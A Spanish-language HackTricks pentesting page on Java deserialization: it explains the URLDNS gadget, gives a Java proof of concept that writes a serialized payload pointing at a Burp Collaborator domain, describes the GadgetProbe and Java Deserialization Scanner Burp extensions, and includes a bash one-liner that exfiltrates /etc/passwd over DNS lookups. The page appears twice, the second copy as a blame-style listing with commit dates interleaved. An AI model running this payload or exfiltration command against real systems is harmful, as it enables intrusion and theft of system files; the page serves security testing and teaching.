hacktricks/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md

## Deserialización de DNS en Java, GadgetProbe y Escáner de Deserialización de Java

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Consigue el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PR al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Solicitud DNS en deserialización

La clase `java.net.URL` implementa `Serializable`, lo que significa que esta clase se puede serializar.
```java
public final class URL implements java.io.Serializable {
```
Esta clase tiene un **comportamiento curioso**. Según la documentación: "**Dos hosts se consideran equivalentes si ambos nombres de host se pueden resolver en las mismas direcciones IP**".\
Entonces, cada vez que un objeto URL llama a **cualquiera** de las funciones **`equals`** o **`hashCode`**, se va a **enviar** una **solicitud DNS** para obtener la dirección IP.

**Llamar** a la función **`hashCode`** **desde** un objeto **URL** es bastante fácil, es suficiente con insertar este objeto dentro de un `HashMap` que va a ser deserializado. Esto se debe a que **al final** de la función **`readObject`** de `HashMap`, se ejecuta este código:
```java
private void readObject(java.io.ObjectInputStream s)
        throws IOException, ClassNotFoundException {
        [   ...   ]
    for (int i = 0; i < mappings; i++) {
        [   ...   ]
        putVal(hash(key), key, value, false, false);
    }
```
Se va a **ejecutar** `putVal` con cada valor dentro del `HashMap`. Pero lo más relevante es la llamada a `hash` con cada valor. Este es el código de la función `hash`:
```java
static final int hash(Object key) {
    int h;
    return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}
```
Como se puede observar, al **deserializar** un **`HashMap`**, la función `hash` se va a ejecutar con cada objeto y durante la ejecución de `hash` se va a ejecutar `.hashCode()` del objeto. Por lo tanto, si se deserializa un `HashMap` que contiene un objeto `URL`, el objeto `URL` ejecutará `.hashCode()`.

Ahora, echemos un vistazo al código de `URLObject.hashCode()`:
```java
 public synchronized int hashCode() {
        if (hashCode != -1)
            return hashCode;

        hashCode = handler.hashCode(this);
        return hashCode;
```
Como se puede ver, cuando un `URLObject` ejecuta `.hashCode()`, se llama `hashCode(this)`. A continuación se puede ver el código de esta función:
```java
 protected int hashCode(URL u) {
        int h = 0;

        // Generate the protocol part.
        String protocol = u.getProtocol();
        if (protocol != null)
            h += protocol.hashCode();

        // Generate the host part.
        InetAddress addr = getHostAddress(u);
        [   ...   ]
```
Se puede observar que se ejecuta un `getHostAddress` al dominio, **lanzando una consulta DNS**.

Por lo tanto, esta clase puede ser **abusada** para **lanzar** una **consulta DNS** y **demostrar** que es posible la **deserialización**, o incluso para **filtrar información** (se puede agregar como subdominio la salida de la ejecución de un comando).

### Ejemplo de código de carga útil URLDNS

Puede encontrar el [código de carga útil URDNS de ysoserial aquí](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). Sin embargo, para facilitar la comprensión de cómo codificarlo, he creado mi propio PoC (basado en el de ysoserial):
```java
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;

public class URLDNS {
	public static void GeneratePayload(Object instance, String file)
            throws Exception {
        //Serialize the constructed payload and write it to the file
        File f = new File(file);
        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
        out.writeObject(instance);
        out.flush();
        out.close();
    }
	public static void payloadTest(String file) throws Exception {
        //Read the written payload and deserialize it
        ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
        Object obj = in.readObject();
        System.out.println(obj);
        in.close();
    }
	
	public static void main(final String[] args) throws Exception {
		String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
		HashMap ht = new HashMap(); // HashMap that will contain the URL
		URLStreamHandler handler = new SilentURLStreamHandler();
    URL u = new URL(null, url, handler); // URL to use as the Key
    ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

    // During the put above, the URL's hashCode is calculated and cached.
    // This resets that so the next time hashCode is called a DNS lookup will be triggered.
    final Field field = u.getClass().getDeclaredField("hashCode");
    field.setAccessible(true);
		field.set(u, -1);
		
		//Test the payloads
		GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
	}
}


class SilentURLStreamHandler extends URLStreamHandler {

    protected URLConnection openConnection(URL u) throws IOException {
        return null;
    }

    protected synchronized InetAddress getHostAddress(URL u) {
        return null;
    }
}
```
### Más información

* [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
* En la idea original, la carga útil de commons collections se cambió para realizar una consulta DNS, esto era menos confiable que el método propuesto, pero este es el post: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)

## GadgetProbe

Puede descargar [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) desde la tienda de aplicaciones de Burp Suite (Extender).

**GadgetProbe** intentará averiguar si algunas **clases de Java existen** en la clase Java del servidor para que pueda saber **si** es **vulnerable** a algún exploit conocido.

### ¿Cómo funciona?

**GadgetProbe** utilizará la misma **carga útil DNS de la sección anterior**, pero **antes** de ejecutar la consulta DNS, intentará **deserializar una clase arbitraria**. Si la **clase arbitraria existe**, se enviará la **consulta DNS** y GadgProbe anotará que esta clase existe. Si la **solicitud DNS** nunca se envía, esto significa que la **clase arbitraria no se deserializó** correctamente, por lo que no está presente o no es **serializable/explotable**.

Dentro de github, [**GadgetProbe tiene algunas listas de palabras**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) con clases de Java para ser probadas.

![](<../../.gitbook/assets/intruder4 (1) (1) (1).gif>)

### Más información

* [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)

## Escáner de deserialización de Java

Este escáner se puede **descargar** desde la tienda de aplicaciones de Burp (**Extender**).\
La **extensión** tiene **capacidades** pasivas y activas.

### Pasivo

Por defecto, **verifica pasivamente** todas las solicitudes y respuestas enviadas **buscando bytes mágicos serializados de Java** y presentará una advertencia de vulnerabilidad si se encuentra alguno:

![](<../../.gitbook/assets/image (290).png>)

### Activo

**Pruebas manuales**

Puede seleccionar una solicitud, hacer clic derecho y `Enviar solicitud a DS - Pruebas manuales`.\
Luego, dentro de la pestaña _Deserialization Scanner_ --> _Manual testing tab_ puede seleccionar el **punto de inserción**. Y **lanzar la prueba** (Seleccione el ataque apropiado dependiendo de la codificación utilizada).

![](../../.gitbook/assets/3-1.png)

Aunque esto se llama "Pruebas manuales", es bastante **automático**. Comprobará automáticamente si la **deserialización** es **vulnerable** a **cualquier carga útil ysoserial** comprobando las bibliotecas presentes en el servidor web y resaltará las vulnerables. Para **comprobar** las **bibliotecas vulnerables** puede seleccionar lanzar **Javas Sleeps**, **sleeps** a través del **consumo de CPU**, o usando **DNS** como se mencionó anteriormente.

**Explotación**

Una vez que haya identificado una biblioteca vulnerable, puede enviar la solicitud a la pestaña _Exploiting Tab_.\
En esta pestaña, debe **seleccionar** el **punto de inyección** nuevamente, escribir la **biblioteca vulnerable** para la que desea crear una carga útil y el **comando**. Luego, simplemente presione el botón de **Ataque** apropiado.

![](<../../.gitbook/assets/4 (1).png>)

### Información de exfiltración DNS de deserialización de Java

Haga que su carga útil ejecute algo como lo siguiente:
```bash
(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
```
### Más información

* [https://techblog.mediaservice.net/2017/05/descubrimiento-y-explotacion-confiable-de-vulnerabilidades-de-deserializacion-de-java/](https://techblog.mediaservice.net/2017/05/descubrimiento-y-explotacion-confiable-de-vulnerabilidades-de-deserializacion-de-java/)

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PR al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
f 2023-06-05 18:33:24 +00:00			`## Deserialización de DNS en Java, GadgetProbe y Escáner de Deserialización de Java`

			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Consigue el [swag oficial de PEASS y HackTricks](https://peass.creator-spring.com)`
			`* Únete al [💬](https://emojipedia.org/speech-balloon/) [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Comparte tus trucos de hacking enviando PR al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`

			`## Solicitud DNS en deserialización`

			La clase `java.net.URL` implementa `Serializable`, lo que significa que esta clase se puede serializar.
			```java
			`public final class URL implements java.io.Serializable {`
			```
			`Esta clase tiene un comportamiento curioso. Según la documentación: "Dos hosts se consideran equivalentes si ambos nombres de host se pueden resolver en las mismas direcciones IP".\`
Translated ['1911-pentesting-fox.md', 'README.md', 'ctf-write-ups/try-ha 2023-06-07 04:36:55 +00:00			Entonces, cada vez que un objeto URL llama a cualquiera de las funciones `equals` o `hashCode`, se va a enviar una solicitud DNS para obtener la dirección IP.
f 2023-06-05 18:33:24 +00:00
			Llamar a la función `hashCode` desde un objeto URL es bastante fácil, es suficiente con insertar este objeto dentro de un `HashMap` que va a ser deserializado. Esto se debe a que al final de la función `readObject` de `HashMap`, se ejecuta este código:
			```java
			`private void readObject(java.io.ObjectInputStream s)`
			`throws IOException, ClassNotFoundException {`
			`[ ... ]`
			`for (int i = 0; i < mappings; i++) {`
			`[ ... ]`
			`putVal(hash(key), key, value, false, false);`
			`}`
			```
			Se va a ejecutar `putVal` con cada valor dentro del `HashMap`. Pero lo más relevante es la llamada a `hash` con cada valor. Este es el código de la función `hash`:
			```java
			`static final int hash(Object key) {`
			`int h;`
			`return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);`
			`}`
			```
Translated ['1911-pentesting-fox.md', 'README.md', 'ctf-write-ups/try-ha 2023-06-07 04:36:55 +00:00			Como se puede observar, al deserializar un `HashMap`, la función `hash` se va a ejecutar con cada objeto y durante la ejecución de `hash` se va a ejecutar `.hashCode()` del objeto. Por lo tanto, si se deserializa un `HashMap` que contiene un objeto `URL`, el objeto `URL` ejecutará `.hashCode()`.
f 2023-06-05 18:33:24 +00:00
			Ahora, echemos un vistazo al código de `URLObject.hashCode()`:
			```java
			`public synchronized int hashCode() {`
			`if (hashCode != -1)`
			`return hashCode;`

			`hashCode = handler.hashCode(this);`
			`return hashCode;`
			```
Translated ['1911-pentesting-fox.md', 'README.md', 'ctf-write-ups/try-ha 2023-06-07 04:36:55 +00:00			Como se puede ver, cuando un `URLObject` ejecuta `.hashCode()`, se llama `hashCode(this)`. A continuación se puede ver el código de esta función:
f 2023-06-05 18:33:24 +00:00			```java
			`protected int hashCode(URL u) {`
			`int h = 0;`

			`// Generate the protocol part.`
			`String protocol = u.getProtocol();`
			`if (protocol != null)`
			`h += protocol.hashCode();`

			`// Generate the host part.`
			`InetAddress addr = getHostAddress(u);`
			`[ ... ]`
			```
			Se puede observar que se ejecuta un `getHostAddress` al dominio, lanzando una consulta DNS.

			`Por lo tanto, esta clase puede ser abusada para lanzar una consulta DNS y demostrar que es posible la deserialización, o incluso para filtrar información (se puede agregar como subdominio la salida de la ejecución de un comando).`

			`### Ejemplo de código de carga útil URLDNS`

Translated ['1911-pentesting-fox.md', 'README.md', 'ctf-write-ups/try-ha 2023-06-07 04:36:55 +00:00			`Puede encontrar el [código de carga útil URDNS de ysoserial aquí](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). Sin embargo, para facilitar la comprensión de cómo codificarlo, he creado mi propio PoC (basado en el de ysoserial):`
f 2023-06-05 18:33:24 +00:00			```java
			`import java.io.File;`
			`import java.io.FileInputStream;`
			`import java.io.FileOutputStream;`
			`import java.io.IOException;`
			`import java.io.ObjectInputStream;`
			`import java.io.ObjectOutputStream;`
			`import java.lang.reflect.Field;`
			`import java.net.InetAddress;`
			`import java.net.URLConnection;`
			`import java.net.URLStreamHandler;`
			`import java.util.HashMap;`
			`import java.net.URL;`

			`public class URLDNS {`
			`public static void GeneratePayload(Object instance, String file)`
			`throws Exception {`
			`//Serialize the constructed payload and write it to the file`
			`File f = new File(file);`
			`ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));`
			`out.writeObject(instance);`
			`out.flush();`
			`out.close();`
			`}`
			`public static void payloadTest(String file) throws Exception {`
			`//Read the written payload and deserialize it`
			`ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));`
			`Object obj = in.readObject();`
			`System.out.println(obj);`
			`in.close();`
			`}`

			`public static void main(final String[] args) throws Exception {`
			`String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";`
			`HashMap ht = new HashMap(); // HashMap that will contain the URL`
			`URLStreamHandler handler = new SilentURLStreamHandler();`
			`URL u = new URL(null, url, handler); // URL to use as the Key`
			`ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.`

			`// During the put above, the URL's hashCode is calculated and cached.`
			`// This resets that so the next time hashCode is called a DNS lookup will be triggered.`
			`final Field field = u.getClass().getDeclaredField("hashCode");`
			`field.setAccessible(true);`
			`field.set(u, -1);`

			`//Test the payloads`
			`GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");`
			`}`
			`}`


			`class SilentURLStreamHandler extends URLStreamHandler {`

			`protected URLConnection openConnection(URL u) throws IOException {`
			`return null;`
			`}`

			`protected synchronized InetAddress getHostAddress(URL u) {`
			`return null;`
			`}`
			`}`
			```
			`### Más información`

			`* [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)`
			`* En la idea original, la carga útil de commons collections se cambió para realizar una consulta DNS, esto era menos confiable que el método propuesto, pero este es el post: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)`

			`## GadgetProbe`

			`Puede descargar [GadgetProbe](https://github.com/BishopFox/GadgetProbe) desde la tienda de aplicaciones de Burp Suite (Extender).`

			`GadgetProbe intentará averiguar si algunas clases de Java existen en la clase Java del servidor para que pueda saber si es vulnerable a algún exploit conocido.`

			`### ¿Cómo funciona?`

			`GadgetProbe utilizará la misma carga útil DNS de la sección anterior, pero antes de ejecutar la consulta DNS, intentará deserializar una clase arbitraria. Si la clase arbitraria existe, se enviará la consulta DNS y GadgProbe anotará que esta clase existe. Si la solicitud DNS nunca se envía, esto significa que la clase arbitraria no se deserializó correctamente, por lo que no está presente o no es serializable/explotable.`

			`Dentro de github, [GadgetProbe tiene algunas listas de palabras](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) con clases de Java para ser probadas.`

			`![](<../../.gitbook/assets/intruder4 (1) (1) (1).gif>)`

			`### Más información`

			`* [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)`

			`## Escáner de deserialización de Java`

			`Este escáner se puede descargar desde la tienda de aplicaciones de Burp (Extender).\`
			`La extensión tiene capacidades pasivas y activas.`

			`### Pasivo`

			`Por defecto, verifica pasivamente todas las solicitudes y respuestas enviadas buscando bytes mágicos serializados de Java y presentará una advertencia de vulnerabilidad si se encuentra alguno:`

			`![](<../../.gitbook/assets/image (290).png>)`

			`### Activo`

			`Pruebas manuales`

			Puede seleccionar una solicitud, hacer clic derecho y `Enviar solicitud a DS - Pruebas manuales`.\
			`Luego, dentro de la pestaña _Deserialization Scanner_ --> _Manual testing tab_ puede seleccionar el punto de inserción. Y lanzar la prueba (Seleccione el ataque apropiado dependiendo de la codificación utilizada).`

			`![](../../.gitbook/assets/3-1.png)`

			`Aunque esto se llama "Pruebas manuales", es bastante automático. Comprobará automáticamente si la deserialización es vulnerable a cualquier carga útil ysoserial comprobando las bibliotecas presentes en el servidor web y resaltará las vulnerables. Para comprobar las bibliotecas vulnerables puede seleccionar lanzar Javas Sleeps, sleeps a través del consumo de CPU, o usando DNS como se mencionó anteriormente.`

			`Explotación`

Translated ['1911-pentesting-fox.md', 'README.md', 'ctf-write-ups/try-ha 2023-06-07 04:36:55 +00:00			`Una vez que haya identificado una biblioteca vulnerable, puede enviar la solicitud a la pestaña _Exploiting Tab_.\`
f 2023-06-05 18:33:24 +00:00			`En esta pestaña, debe seleccionar el punto de inyección nuevamente, escribir la biblioteca vulnerable para la que desea crear una carga útil y el comando. Luego, simplemente presione el botón de Ataque apropiado.`

			`![](<../../.gitbook/assets/4 (1).png>)`

			`### Información de exfiltración DNS de deserialización de Java`

			`Haga que su carga útil ejecute algo como lo siguiente:`
			```bash
			`(i=0;tar zcf - /etc/passwd \| xxd -p -c 31 \| while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)`
			```
			`### Más información`

			`* [https://techblog.mediaservice.net/2017/05/descubrimiento-y-explotacion-confiable-de-vulnerabilidades-de-deserializacion-de-java/](https://techblog.mediaservice.net/2017/05/descubrimiento-y-explotacion-confiable-de-vulnerabilidades-de-deserializacion-de-java/)`

			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Descubre [La Familia PEASS](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Obtén el [swag oficial de PEASS y HackTricks](https://peass.creator-spring.com)`
Translated ['1911-pentesting-fox.md', 'README.md', 'ctf-write-ups/try-ha 2023-06-07 04:36:55 +00:00			`* Únete al [💬](https://emojipedia.org/speech-balloon/) grupo de Discord o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Comparte tus trucos de hacking enviando PR al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
f 2023-06-05 18:33:24 +00:00
			`</details>`